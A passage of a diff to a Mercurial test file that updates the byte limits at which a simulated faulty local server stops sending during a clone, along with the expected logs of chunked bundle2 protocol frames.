$ hg clone http://localhost:$HGPORT/ clone
@@ -825,7 +826,7 @@
Servers stops after bundle2 stream params header
- $ hg serve --config badserver.closeaftersendbytes=1011 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=992 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -871,7 +872,7 @@
Server stops sending after bundle2 part header length
- $ hg serve --config badserver.closeaftersendbytes=1020 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1001 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -920,7 +921,7 @@
Server stops sending after bundle2 part header
- $ hg serve --config badserver.closeaftersendbytes=1067 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1048 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -973,7 +974,7 @@
Server stops after bundle2 part payload chunk size
- $ hg serve --config badserver.closeaftersendbytes=1088 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1069 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1029,7 +1030,7 @@
Server stops sending in middle of bundle2 payload chunk
- $ hg serve --config badserver.closeaftersendbytes=1549 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1530 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1086,7 +1087,7 @@
Server stops sending after 0 length payload chunk size
- $ hg serve --config badserver.closeaftersendbytes=1580 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1561 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1148,8 +1149,7 @@
Server stops sending after 0 part bundle part header (indicating end of bundle2 payload)
This is before the 0 size chunked transfer part that signals end of HTTP response.
-# $ hg serve --config badserver.closeaftersendbytes=1755 -p $HGPORT -d --pid-file=hg.pid -E error.log
- $ hg serve --config badserver.closeaftersendbytes=1862 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1736 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1165,25 +1165,20 @@
$ killdaemons.py $DAEMON_PIDS
#if py36
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -25
- sendall(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- sendall(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- sendall(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- sendall(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- sendall(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- sendall(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- sendall(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- sendall(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- sendall(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- sendall(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- sendall(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- sendall(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -20
+ sendall(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ sendall(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ sendall(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ sendall(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ sendall(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ sendall(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ sendall(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ sendall(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ sendall(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
sendall(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write limit reached; closing socket
@@ -1193,25 +1188,20 @@
#else
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26
- write(9 from 9) -> (851) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (842) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- write(47 from 47) -> (795) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- write(9 from 9) -> (786) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- write(473 from 473) -> (313) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (304) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (295) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- write(38 from 38) -> (257) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- write(9 from 9) -> (248) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- write(64 from 64) -> (184) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- write(9 from 9) -> (175) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (166) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- write(41 from 41) -> (125) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- write(9 from 9) -> (116) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (107) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- write(35 from 35) -> (72) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- write(9 from 9) -> (63) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- write(45 from 45) -> (18) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21
+ write(9 from 9) -> (744) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (735) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ write(47 from 47) -> (688) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ write(9 from 9) -> (679) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ write(473 from 473) -> (206) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (197) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (188) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ write(38 from 38) -> (150) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ write(9 from 9) -> (141) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ write(64 from 64) -> (77) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ write(9 from 9) -> (68) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ write(9 from 9) -> (59) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ write(41 from 41) -> (18) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
write(9 from 9) -> (9) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write(9 from 9) -> (0) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
write limit reached; closing socket
@@ -1227,7 +1217,7 @@
Server sends a size 0 chunked-transfer size without terminating \r\n
- $ hg serve --config badserver.closeaftersendbytes=1865 -p $HGPORT -d --pid-file=hg.pid -E error.log
+ $ hg serve --config badserver.closeaftersendbytes=1739 -p $HGPORT -d --pid-file=hg.pid -E error.log
$ cat hg.pid > $DAEMON_PIDS
$ hg clone http://localhost:$HGPORT/ clone
@@ -1243,25 +1233,20 @@
$ killdaemons.py $DAEMON_PIDS
#if py36
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -26
- sendall(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- sendall(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- sendall(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- sendall(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (307) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (298) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
- sendall(38 from 38) -> (260) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
- sendall(9 from 9) -> (251) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
- sendall(64 from 64) -> (187) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
- sendall(9 from 9) -> (178) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (169) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
- sendall(41 from 41) -> (128) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
- sendall(9 from 9) -> (119) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (110) 4\\r\\n\x00\x00\x00\x1d\\r\\n (esc)
- sendall(35 from 35) -> (75) 1d\\r\\n\x16cache:rev-branch-cache\x00\x00\x00\x03\x00\x00\\r\\n (esc)
- sendall(9 from 9) -> (66) 4\\r\\n\x00\x00\x00'\\r\\n (esc)
- sendall(45 from 45) -> (21) 27\\r\\n\x00\x00\x00\x07\x00\x00\x00\x01\x00\x00\x00\x00default\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\\r\\n (esc)
+ $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -21
+ sendall(9 from 9) -> (747) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (738) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
+ sendall(47 from 47) -> (691) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
+ sendall(9 from 9) -> (682) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
+ sendall(473 from 473) -> (209) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (200) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (191) 4\\r\\n\x00\x00\x00 \\r\\n (esc)
+ sendall(38 from 38) -> (153) 20\\r\\n\x08LISTKEYS\x00\x00\x00\x01\x01\x00 \x06namespacephases\\r\\n (esc)
+ sendall(9 from 9) -> (144) 4\\r\\n\x00\x00\x00:\\r\\n (esc)
+ sendall(64 from 64) -> (80) 3a\r\n96ee1d7354c4ad7372047672c36a1f561e3a6a4c 1\npublishing True\r\n
+ sendall(9 from 9) -> (71) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
+ sendall(9 from 9) -> (62) 4\\r\\n\x00\x00\x00#\\r\\n (esc)
+ sendall(41 from 41) -> (21) 23\\r\\n\x08LISTKEYS\x00\x00\x00\x02\x01\x00 namespacebookmarks\\r\\n (esc)
sendall(9 from 9) -> (12) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(9 from 9) -> (3) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
sendall(3 from 5) -> (0) 0\r\n
@@ -1272,25 +1257,20 @@
#else
- $ "$PYTHON" $TESTDIR/filtertraceback.py < error.log | tail -27
- write(9 from 9) -> (854) 4\\r\\n\x00\x00\x00\x00\\r\\n (esc)
- write(9 from 9) -> (845) 4\\r\\n\x00\x00\x00)\\r\\n (esc)
- write(47 from 47) -> (798) 29\\r\\n\x0bCHANGEGROUP\x00\x00\x00\x00\x01\x01\x07\x02 \x01version02nbchanges1\\r\\n (esc)
- write(9 from 9) -> (789) 4\\r\\n\x00\x00\x01\xd2\\r\\n (esc)
- write(473 from 473) -> (316) 1d2\\r\\n\x00\x00\x00\xb2\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>6a3df4de388f3c4f8e28f4f9a814299a3cbb5f50\\ntest\\n0 0\\nfoo\\n\\ninitial\x00\x00\x00\x00\x00\x00\x00\xa1j=\xf4\xde8\x8f<O\x8e(\xf4\xf9\xa8\x14)\x9a<\xbb_P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\xee\x1dsT\xc4\xadsr\x04vr\xc3j\x1fV\x1e:jL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00-foo\x00b80de5d138758541c5f05265ad144ab9fa86d1db\\n\x00\x00\x00\x00\x00\x00\x00\x07foo\x00\x00\x00h\xb8\\r\xe5\xd18u\x85A\xc5\xf0Re\xad\x14J\xb9\xfa\x86\xd1\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\